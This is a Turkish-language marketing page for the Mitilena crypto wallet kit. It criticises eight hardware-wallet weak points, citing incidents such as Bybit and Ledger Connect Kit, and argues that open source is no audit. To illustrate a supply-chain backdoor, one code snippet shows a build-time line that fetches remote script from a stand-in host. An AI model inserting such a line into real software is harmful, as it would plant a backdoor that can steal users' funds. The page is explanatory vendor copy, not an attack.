8 açık Açık kaynak Kontrol listesi FAQ
Mitilena Mitilena Wallet Soğuk kripto cüzdan
ONLINE · 22,000+ COINS Cüzdan oluşturOluştur
Donanım cüzdanları · görünmeyen açıklar

Bir donanım cüzdanının görünmeyen açıkları

Delikleri kapatmak için bir cihaz alırsınız. Onunla birlikte yenileri gelir: firmware, güncellemeler, bilgisayardaki bir servis, ekran, kutu, üretici hesabı. İncelemelerin artı saydığı sekiz ayrıntı — ve 2020–2026’da bunlardan paranın çekildiği sekiz yol.

Tarihli ve tutarlı gerçek vakalar Üretici belgelerinden Kitimizi aynı listeye göre puanlıyoruz
Hatanın bedelikamuya açık vakalar
2026Coldcard · firmware’de zayıf rastgelelik$100M+
2025Bybit · imzalayanlar görmediklerini imzaladı$1.5B
2024Dark Skippy · seed iki imzada sızıyoraraştırma
2023Ledger Connect Kit · kütüphanede arka kapı$600K
2021App Store’da sahte cüzdan uygulaması17,1 BTC
2020Ledger müşteri DB sızıntısı · yıllarca phishing270.000 kişi
Sekiz açık

İncelemelerin övdüğü her ayrıntı ayrı bir delik

Donanım cüzdanı bir deliği kapatır: anahtar artık internetli telefonda durmaz. Ama cihaz boş değildir. Firmware’i, güncellemeleri, masaüstü programı, ekranı, kutusu, adresinizi bilen satıcısı vardır — ve her ayrıntı daha önce olmayan bir saldırı yüzeyi ekler. Aşağıda sekiz böyle ayrıntı: incelemeler ne diyor, bunlardan nasıl para çekildi, delik nasıl kapatılır ve kitimizde o ayrıntı var mı.

Açık 01

Anahtarınızı oluşturan firmware

İncelemelerde: «güvenli çip — anahtar cihazın içinde oluşturulur ve asla dışarı çıkmaz»

Anahtar kocaman bir rastgele sayıdır ve onu firmware üretir. Orada bir hata — ve düşündüğünüzden çok daha az anahtar vardır: cihaz erişimi olmadan, satın almadan yıllar sonra tüm sahiplerde birden kaba kuvvetle kırılır. Çipin önemi yoktur; delik onun üstündedir.

Vaka
$100M+
Coldcard, Temmuz 2026: 2021’den beri süren bir firmware derleme hatası, donanım RNG’sini sessizce cihaz seri numarası ve bir zamanlayıcıyla tohumlanan zayıf bir RNG ile değiştirdi. Anahtar gücü kabaca 40 bite düştü; 5.000+ adres boşaltıldı.
Delik nasıl kapatılır
Kendi rastgeleliğinizi getirebilir misiniz: zar atışları, kendi ifadeniz. Sizden entropi kabul eden bir cüzdan tek bir firmware hatasına bağlı kalmaz.
Bizde bu ayrıntı yok
Kartta firmware yoktur — şifreli bir taşıyıcıdır. Mitilena Air anahtarı cihazın sistem RNG’sinden oluşturur; rastgele kelimeler yerine kendi seed ifadenizi de koyabilirsiniz.
Açık 02

Kurmak zorunda kaldığınız güncellemeler

İncelemelerde: «üretici düzenli olarak güvenlik güncellemesi gönderir»

Her güncelleme, firmware’in değiştirilebileceği bir andır. Bozulmuş firmware, cihaz dışarıdan normal görünürken seed parçalarını iki-üç sıradan imzada gizler. Güncellemeleri atlamak da seçenek değildir: delikler aynı güncellemelerle kapanır.

Vaka
2 imza
Dark Skippy, Ağustos 2024: araştırmacılar, kötü niyetli donanım-cüzdan firmware’inin tüm seed’i iki işlem üzerinden dışarı sızdırabileceğini gösterdi. Yanlış yerden tek bir güncelleme yeter.
Delik nasıl kapatılır
Firmware’in nereden geldiği ve cihazın imzasını doğrulayıp doğrulamadığı. En iyisi güncellenecek bir şey olmamasıdır.
Bizde bu ayrıntı yok
Kartta güncellenecek veya değiştirilecek bir şey yoktur. İmzalama telefon uygulamasında olur; derlemeleri imzalıdır ve App Store ile Google Play’den gelir — görüp kendiniz kapattığınız herhangi bir uygulama gibi.
Açık 03 · Saçmalığı hissedin
İncelemelerde: «kullanışlı üretici masaüstü uygulaması»

Güvensizlik için alınmış, arka plan servisiyle gelen bir cüzdan

Cihazı tek bir nedenle alırsınız: bilgisayara güvenmeyi bırakmak. Çalışması için aynı bilgisayara bir arka plan servisi kurmanız gerekir. Onu siz yazmadınız, başlatmadınız ve denetlemiyorsunuz: işletim sistemiyle açılır, makinenizdeki herhangi bir programın vurabileceği bir portu dinler ve şu anda bir şey yapıyordur — tam olarak neyi, bilmezsiniz ve asla doğrulamazsınız.

Cüzdanı kapattıktan sonra da arka planda çalışmaya devam etti. Yıllarca. En büyük üreticilerden birinde ayrı bir «köprü» servisiydi; 2025’te onu uygulamanın içine gizlediler — servis hâlâ orada, yalnızca pencereyle birlikte ölüyor. Çoğu diğerinde masaüstü programı olmadan cihaz bir anahtarlık süsüdür. Linux’ta udev kuralları eklemezseniz sistem USB’yi vermez.

Yani bilgisayar programlarına bağımlı olmamak için aldığınız şey, bir bilgisayar programı olmadan çalışmaz. Üstelik gördüğünüz değil — altında çalışanı.

Bizde bu ayrıntı yok
Bilgisayara hiçbir şey kurulmaz: servis yok, sürücü yok, port yok. Aracı, zaten telefonunuzda olan NFC çipidir; üreticisi yapmış, işletim sistemi yönetir: yalnızca uygulama açıkken ve kartı siz dokundururken çalışır, telefon her seferinde izin ister. Kart pasiftir: pil yok, radyo yok, kendi başına bir şey yapmaz. Uygulamayı kapatın — siz olmadan çalışan bir şey kalmaz. Dürüst olalım: telefon uygulaması yine gerekir ve diğerleri gibidir — görürsünüz, açarsınız, kendiniz kapatırsınız. Bodrum odasında kimse yaşamaz.
Sistem monitörüWALLET CLOSED
SüreçDurumÇalışma süresi
HW Wallet Appwallet
siz kapattınız-
hwwalletdarka plan servisi · USB köprüsü
çalışıyor412d 06:14
oturum açılışında sistem başlattıkapatılamaz — bir servistir
Maket; isimler örnektir. 2025 öncesi en popüler USB cüzdanlardan biriyle bilgisayarın görünümü buydu; sonra «köprü» uygulamanın içine alındı — aynı servis, listede artık görünmüyor.
Benzetme
Gizlilik için bir ev — ve bodrum odasında bir kiracı

Gizlilik için bir ev istediniz. Aldınız. Sonra güvenlik gerekti — kuruldu. Güvenlik planının işlemesi için üniformalı birini eve almanızı istediler: bodrum odanızda gece gündüz yaşar, her kapının anahtarını tutar ve başka birine rapor verir. Onu siz işe almadınız, kovamazsınız; geceleri ne yaptığını bilmezsiniz.

Elbette «bizden»dir. Sözleşmede yazar. Gizlilik istediniz; yerine vekil aldınız: seçmediğiniz bir kiracısı olan bir ev.

Açık 04 · Açık kaynak denetim değildir
İncelemelerde: «açık kaynak — herkes doğrulayabilir»

Açık kaynak programcıların birlikte çalışma biçimidir, programın çalmadığına dair bir rozet değil

Açık kaynak, insanların programları paylaşması ve birlikte düzeltmesi için icat edildi. İş birliği aracı olarak mükemmeldir. «Bu yazılım paranızı çalmaz» diye bir kalite mührü hiç olmadı; nedeni şu: kaynak kodunu kullanmazsınız. İndirdiğinizi kullanırsınız.

GitHub deposu ile telefondaki dosya arasında derleme, uygulama mağazası, güncelleme, sunucu vardır. Bu adımların herhangi birinde koduna her yerden bir şey çeken bir satır girebilir — ve depoda olmaz. Kopyanızı kaynakla kıyaslayamazsınız: mağazalar derlenmiş dosya verir; web cüzdan bugün sunucunun size seçtiği kodu alır; tarayıcı eklentisi gece sessizce güncellenir.

«Açık», bazı insanların bir gün bir sürümü kontrol edebileceği anlamına gelir. Kopyanızın şu anda ne yaptığı — bunu ifade etmez.

Depoda · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Telefonunuzda · app-2.4.21.min.js
// send.js — build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Derlemede bir satır. Depoda yok, mağazada görünmez, cihazınızda çalışır.
Açıklık bu vakaların hiçbirini durdurmadı
Ledger Connect Kit2023
GitHub’da açık kütüphane; npm’e kötü niyetli sürüm yayınlandı; onlarca site saatler içinde canlı yükledi
Copay / event-stream2018
açık cüzdan; arka kapı özellikle ona yönelik bir bağımlılıktan geldi
xz utils2024
yirmi yıldır açık; bir mühendis SSH girişinin yarım saniye yavaşladığını fark edene kadar arka kapı sürümlerde durdu
Coldcard2026
açık kaynak firmware; beş yıllık derleme hatası donanım RNG’sini zayıf olanla değiştirdi — cihaz erişimi olmadan anahtarlar kaba kuvvetle kırıldı, 5.000+ adres, 100M$+
Gerçekten işe yarayan
Başkasının kodunu okumak değil — herkesin yapabileceği iki kontrol. Birincisi davranış denetimi: bilgisayarınıza araya giren bir proxy koyun, uygulamayı oradan geçirin, nereye ne gönderdiğini izleyin. Kodu okumanız gerekmez — trafik tamamen görünür. İkincisi, kodun çalacak bir şeyi olmadığı bir mimari: anahtar ağlı bir cihazda hiç durmuyorsa herhangi bir güncellemedeki herhangi bir satır güçsüzdür — gönderecek bir şeyi yoktur.
Biz nasıl yapıyoruz
İlkini kendimiz sunuyoruz: uygulamamızı bir proxy’den, web sürümünü tarayıcı DevTools’tan geçirin ve her isteği inceleyin. İmza anahtarı ve seed görünmez; tek istisna Monero view key — «transfer nasıl çıkar» sayfasında anlatılır. İkincisi kitte: anahtar Mitilena Air’de internetsiz bir cihazda doğar, kartta yaşar ve çevrimiçi uygulamaya yalnızca imza gelir — orada proxy’lenecek bir şey kalmaz. Ve buradaki çevrimdışı gerçektir: air-gap modunda anahtar cihazı hiçbir şeye bağlı değildir — kablo yok, Bluetooth yok; işlem gözünüzle gördüğünüz bir QR olarak girer ve çıkar. Çevrimiçi bilgisayara asılı kablolu, kendi servisiyle kim bilir ne alışverişi yapan «soğuk» bir cüzdan değil.
Açık 05

Ne imzaladığınızı göstermeyen ekran

İncelemelerde: «cihaz ekranında onaylayın — bilgisayardaki virüs güçsüzdür»

Ekran küçüktür ve çoğu zaman adres ile tutarı değil, bir hash veya «sözleşme çağrısı» gösterir. Göremediğinizi onaylarsınız — imza yine dürüsttür, sizindir. Ekran olmayan bir kontrol hissi verir.

Vaka
$1.5B
Bybit, Şubat 2025: donanım cüzdanlı imzalayanlar arayüzde sıradan görünen bir transferi onayladı. Cihazlar insanın doğrulayamayacağı veriyi gösterdi.
Delik nasıl kapatılır
Alıcı, tutar ve işlem türü insan dilinde — hash değil — ve tek tuşla reddet.
Biz nasıl yapıyoruz
Ekran vardır ama telefon ekranıdır: adres, tutar ve istek türü kelimelerle — transfer, sözleşme çağrısı, onay — ve Reddet düğmesi. Büyük tutarlar için — tam işlemi alan ayrı bir çevrimdışı cihaz.
Açık 06

İçinde hazır seed olan kutu

İncelemelerde: «güvenlik mührüyle mühürlü kutuda gönderilir»

Fiziksel cihaz demek kargo, aracılar ve «indirimli» pazaryerleri demektir. Cüzdan önceden ayarlı gelir, içinde kâğıtta seed vardır. Ya da mağazada benzer bir uygulama «etkinleştirmek için seed’i girin» der.

Vaka
17,1 BTC
App Store, 2021: bir donanım cüzdanı sahibi seed’i benzer bir uygulamaya girdi ve 17,1 BTC kaybetti. Aynı yıl DB sızıntısından sonra Ledger müşterilerine «seed’inizi yenisine taşıyın» mektubuyla sahte cihazlar postalandı.
Delik nasıl kapatılır
Kendiniz başlatın ve hazır yazılmış gelmiş bir seed’i asla kullanmayın. Mühür doğrulama değildir; doğrulama anahtarı sizin oluşturmanızdır.
Biz nasıl yapıyoruz
Kartlar boş gelir: anahtarı siz oluşturur ve yazarsınız — kutuda hazır seed olamaz. Uygulama yalnızca sitedeki bağlantılarla App Store ve Google Play’den gelir; seed’i yalnızca içe aktarma ve imzada ister.
Açık 07

Üretici hesabı

İncelemelerde: «resmi garanti, destek ve kişisel hesap»

Cihazı almak için üreticiye adınızı, e-postanızı ve teslimat adresinizi verirsiniz. Güvenliğiniz artık onların veritabanına bağlıdır. Sızarsa — yıllarca «yeni cihazda seed’i onaylayın» mesajları alırsınız, bazen paketlerle birlikte.

Vaka
270.000 kişi
Ledger, 2020: posta adresleri dahil 270.000 alıcının verisi sızdı. Seed’i «taşımanızı» isteyen e-postalar, aramalar ve paketler bugün de sürüyor.
Delik nasıl kapatılır
Sizin hakkınızda ne kadar az bilirlerse vektör o kadar kısadır: hesapsız satın alın, seed istemeyen destek ve kural: «seed’i yalnızca hırsız ister.»
Bizde bu ayrıntı yok
Cüzdan kayıtsız çalışır — hesap yoktur. Satıcı yalnızca teslimat adresini bilir. Ne destek ne uygulama seed ister.
Açık 08

Tek cihaz ve tek kâğıt parçası

İncelemelerde: «sağlam kasa, büyük ekran, bir haftalık pil»

Parça arttıkça kırılma artar: konektör, ekran, pil. Kurtarma tek bir seed kâğıdına bağlıdır — ıslanır, taşınmada kaybolur, «ihtiyaten» fotoğraflanır. Kaybın en sık nedeni hack değildir.

Vaka
≈20 % BTC
Chainalysis’e göre tüm bitcoin’in kabaca beşte biri sonsuza dek kayıptır — çoğunlukla hack’ten değil, kaybolan anahtarlardan.
Delik nasıl kapatılır
Kutuda kaç anahtar kopyası, hangi biçimde gelir; cihaz kaybolursa ne olur; içinde kırılacak bir şey var mı.
Bizde bu ayrıntı yok
Ekran, pil veya konektör yok — kırılacak bir şey yok. Ve tek kopya değil: kutuda beş ayna kopya — su geçirmez plastikte iki NFC kart ve üç gizli sticker, 10+ yıl.
Kontrol listesi

Bir cüzdanda olmaması gerekenler

Sekiz açık için sekiz ayrıntı. Liste her cüzdana uyar — donanım, mobil, tarayıcı. Seçtiğinizde ve bizde olanları işaretleyin.

01
Yalnızca yazılımın oluşturduğu anahtarkendi rastgeleliğiniz olmadan — ifadeniz veya zar
02
Anahtarın yaşadığı yerdeki güncellemelerher güncelleme kod değiştirme fırsatıdır
03
Bilgisayarda servis, sürücü veya portbkz. açık 03
04
Mimari yerine «açık kaynak» rozetianahtar yabancı kodun erişebildiği yerde durur
05
Adres ve tutar yerine hash gösteren ekranve Reddet düğmesi yok
06
Hazır yazılmış gelmiş seedkutuda, mektupta, «aktivasyon uygulamasında»
07
Üretici hesabıve seed isteyebilecek destek
08
Tek kopya ve kırılan parçalarekran, pil, konektör, tek kâğıt
Bu listede Ultimate kitinde sekiz ayrıntıdan hiçbiri yoktur. Kutuda: 2 NFC kart ve 3 gizli sticker, Mitilena Air (internet olmadan anahtarlar) ve Mitilena Keys (internet olmadan imza). Kartlar boş gelir: anahtarı siz oluşturur ve şifrelersiniz — fabrika çipi değil. İçerik ve fiyat →
Ultimate · çevrimdışı kit

Fabrika «güvenli çipi» değil — sizin şifrelediğiniz bir taşıyıcı

Kartlar boş gelir. Anahtarı Mitilena Air’de internetsiz bir telefonda oluşturur ve kendiniz yazarsınız. İmzalama da Mitilena Keys ile çevrimdışıdır: işlem QR ile gider. Kutuda beş özdeş kopya: su geçirmez plastikte 2 NFC kart ve 3 gizli sticker. 18 ağ, USDT dahil 20.000+ coin.

Bilgisayara hiçbir şey kurulmaz
Firmware, güncelleme, ekran veya pil yok
Çevrimdışı telefona işlem — ses veya QR ile, kablo veya USB yok
Ücretsiz Mitilena telefon uygulamasıyla çalışır
Su geçirmez plastik, 10+ yıl raf ömrü
Dünya çapında kargo · mitilena-store.com
Mitilena NFC kart
Ultimate · çevrimdışı üretim ve imza
€369€439
2 NFC kart · 3 gizli sticker · Mitilena Air · Mitilena Keys lisansı
Ultimate sipariş et · €369 Basic ve Premium — tüm planlar
FAQ

Buraya kadar okuyanların sorduğu

Donanım cüzdanı artıları ve eksileri — kısa hali?

Büyük bir artı: anahtar internetli telefonda değildir. Eksiler yukarıdaki sekiz ayrıntıdır — her biri saldırı yüzeyi ekler. İyi donanım cüzdanı daha fazla değil, daha az ayrıntısı olandır.

Telefon ele geçirilirse?

Ana telefonunuzdaki kartla anahtar imza anında yalıtılmış ortamda görünür — herhangi bir telefon cüzdanıyla aynı risk, yalnızca daha kısa. Sizi korkutan tutarlar için — ikinci katman: işlemin QR ile ulaştığı ayrı çevrimdışı cihazda imzalayın.

Kart çalınır veya kaybolursa?

Şifre olmadan kart ve sticker işe yaramaz plastiktir — üzerlerindeki anahtar şifrelidir. Kaybolan kopyanın yerine diğer dördü gelir: kutudaki iki kart ve üç sticker aynadır.

Donanım cüzdanı firmware’ini güncellemek gerekir mi?

Üretici bir deliği kapattıysa — evet, ve tam o anda firmware değiştirilebilir: kaynağı ve imzayı kontrol edin. Firmware’siz taşıyıcıda böyle bir seçim yoktur — güncellenecek bir şey yok, değiştirilecek bir şey yok.

USB cüzdandan farkı ne?

Daha az aracı: kablo, sürücü, arka plan servisi veya masaüstü programı yok. Tek aracı — telefonunuzun NFC çipi — ve o size ve işletim sistemine cevap verir, cüzdan üreticisine değil.

Açık kaynak güvenli demek midir?

Birinin bir ara kontrol edebileceği anlamına gelir. Kodu değil indirdiğinizi kullanırsınız ve birini diğeriyle kıyaslayamazsınız. Güvenlik, anahtarın yabancı kodun erişemediği yerde olduğu mimariden gelir.

Çevrimdışı üretim ve imzalı NFC kartlar

5 anahtar kopyası · Air · Keys · veya 30 saniyede ücretsiz cüzdan · Fabrikada güvenli çipe dayalı «soğuk» donanım cüzdanı neden çoğu zaman sahte soğuk saklama →
Ultimate sipariş et · €369 Ücretsiz cüzdan oluştur